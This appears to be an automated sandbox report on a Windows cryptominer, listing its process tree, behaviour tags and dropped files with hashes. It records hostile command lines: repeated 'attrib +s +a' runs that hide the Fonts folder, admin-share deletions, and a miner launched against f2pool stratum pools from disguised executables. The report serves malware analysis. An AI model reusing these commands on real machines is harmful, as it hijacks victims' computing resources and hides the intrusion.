C:\Windows\SysWOW64\attrib.exe: attrib +s +a C:\Windows\Fonts (level 4)
-
C:\Windows\SysWOW64\cmd.exe: cmd /c attrib +s +a %SystemRoot%\Fonts (level 3)
-
C:\Windows\SysWOW64\attrib.exe: attrib +s +a C:\Windows\Fonts (level 4)
-
C:\Windows\SysWOW64\cmd.exe: cmd /c attrib +s +a %SystemRoot%\Fonts (level 3)
-
C:\Windows\SysWOW64\attrib.exe: attrib +s +a C:\Windows\Fonts (level 4)
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.exe: cmd /c attrib +s +a %SystemRoot%\Fonts (level 3)
-
C:\Windows\SysWOW64\attrib.exe: attrib +s +a C:\Windows\Fonts (level 4)
-
C:\Windows\SysWOW64\cmd.exe: cmd /c attrib +s +a %SystemRoot%\Fonts (level 3)
-
C:\Windows\SysWOW64\attrib.exe: attrib +s +a C:\Windows\Fonts (level 4)
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.exe: cmd /c attrib +s +a %SystemRoot%\Fonts (level 3)
-
C:\Windows\SysWOW64\attrib.exe: attrib +s +a C:\Windows\Fonts (level 4)
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.exe: cmd /c attrib +s +a %SystemRoot%\Fonts (level 3)
-
C:\Windows\SysWOW64\attrib.exe: attrib +s +a C:\Windows\Fonts (level 4)
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.exe: cmd /c attrib +s +a %SystemRoot%\Fonts (level 3)
-
C:\Windows\SysWOW64\attrib.exe: attrib +s +a C:\Windows\Fonts (level 4)
- Drops file in Windows directory
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.exe: cmd /c attrib +s +a %SystemRoot%\Fonts (level 3)
-
C:\Windows\SysWOW64\attrib.exe: attrib +s +a C:\Windows\Fonts (level 4)
- Views/modifies file attributes
-
\??\c:\windows\Fonts\svchost.exe: c:\windows\Fonts\svchost.exe (level 1)
- Executes dropped EXE
-
\??\c:\windows\Fonts\rundlls.exe: "rundlls" -o stratum+tcp://x.f2pool.info:1230 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash -o stratum+tcp://m.f2pool.info:1235 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash (level 2)
- Detected Stratum cryptominer command
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
-
C:\Windows\SysWOW64\net1.exe: C:\Windows\system32\net1 share c$ /delete (level 1)
-
C:\Windows\SysWOW64\net1.exe: C:\Windows\system32\net1 share f$ /delete (level 1)
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
-
C:\Users\Admin\AppData\Local\Temp\tem.vbs
Filesize 215B
MD5 535a478cc80a0fbbf990eed73f8788bb
SHA1 459479dadaf00f3fa0de78f640c34dd426fd61aa
SHA256 323a4134deb72847221aa880fffefe4c191d73bc69b4d246a5e9afb57dba6c51
SHA512 3c96197cc51766f9d28fd69800865c88d015d50713a2aea6d71c097c6f4b0851535790f6adac51064b9b87c68dba268843ebb74a3da372dcc47eb39870ebdad1
-
C:\Windows\Fonts\conhost.exe
Filesize 2.9MB
MD5 1b9583c6c3eab1da961aec9e42bfbcb8
SHA1 c60f85fa6bcc463b3d38b7714916b241f2139650
SHA256 6260081aae673484638c99635bdc23513a8ac5b1c89d78de78f0356b6ca30380
SHA512 0bec2663078ef087412d69c46d8e73fd015976fc7fee009e10922ec75e9d9d1a9880c042e487eb0708842c948819581837d672abfcc0cceb211519eeecf516b4
-
C:\Windows\Fonts\rundlls.exe
Filesize 5.2MB
MD5 ed499b3a95e11ecf57e5131cd82c2a14
SHA1 7f37e85068457497f5f34e73edde4963694cfc19
SHA256 c91015e3342a922219ed485fefb77181844fd7a38d671d0c41fe21c3274887f5
SHA512 f6dfbde51caa1aeea30b1e35aca9f7695805ba99fa97ded53f8a08f19cf578e6a5d5ef1169bdd3144528d574ca887c8a1d786245a8c9bdffd45387f285f47fd0
-
C:\Windows\Fonts\svchost.exe
Filesize 87KB
MD5 c945fa7d5ecb219c248ea09ea3bbe8e4
SHA1 8a8596b7e08dc0fa756e6977c64d57ab07e7ab23
SHA256 6dedb94f143de721acb86543be5e796a36495f47e3faf650e5da69b9f2ccf54b
SHA512 3e2e43e4aa67524712b1e824a9120b8136425feb0fe77d1110764539ec4f46eacd2d66bebbf54757195dd02b454069c44d7a1f5e7ffea65ca84744c64cd2962b
-
C:\Windows\TEMP\csonhost.bat
Filesize 6KB
MD5 9da29265b1391c18f00c959c64b3fb65
SHA1 dee2f9ded1706933f452ebcd2d5ccd8818af713e
SHA256 fcf3e0486e76ea956d81dedfc64eaeb597ed0459d4356221f8f1e7f18d996824
SHA512 6d9df7132fd07c8de64501d7df5ecc421f801724e6c854952a627aead0702e452fd366e439542e24960415c58145cf99c1231ac41815f7fece394d24a39260e2
-
\??\c:\windows\Fonts\conhost.exe
Filesize 2.9MB
MD5 1b9583c6c3eab1da961aec9e42bfbcb8
SHA1 c60f85fa6bcc463b3d38b7714916b241f2139650
SHA256 6260081aae673484638c99635bdc23513a8ac5b1c89d78de78f0356b6ca30380
SHA512 0bec2663078ef087412d69c46d8e73fd015976fc7fee009e10922ec75e9d9d1a9880c042e487eb0708842c948819581837d672abfcc0cceb211519eeecf516b4
-
\??\c:\windows\Fonts\rundlls.exe
Filesize 5.2MB
MD5 ed499b3a95e11ecf57e5131cd82c2a14
SHA1 7f37e85068457497f5f34e73edde4963694cfc19
SHA256 c91015e3342a922219ed485fefb77181844fd7a38d671d0c41fe21c3274887f5
SHA512 f6dfbde51caa1aeea30b1e35aca9f7695805ba99fa97ded53f8a08f19cf578e6a5d5ef1169bdd3144528d574ca887c8a1d786245a8c9bdffd45387f285f47fd0
-
\??\c:\windows\Fonts\svchost.exe
Filesize 87KB
MD5 c945fa7d5ecb219c248ea09ea3bbe8e4
SHA1 8a8596b7e08dc0fa756e6977c64d57ab07e7ab23
SHA256 6dedb94f143de721acb86543be5e796a36495f47e3faf650e5da69b9f2ccf54b
SHA512 3e2e43e4aa67524712b1e824a9120b8136425feb0fe77d1110764539ec4f46eacd2d66bebbf54757195dd02b454069c44d7a1f5e7ffea65ca84744c64cd2962b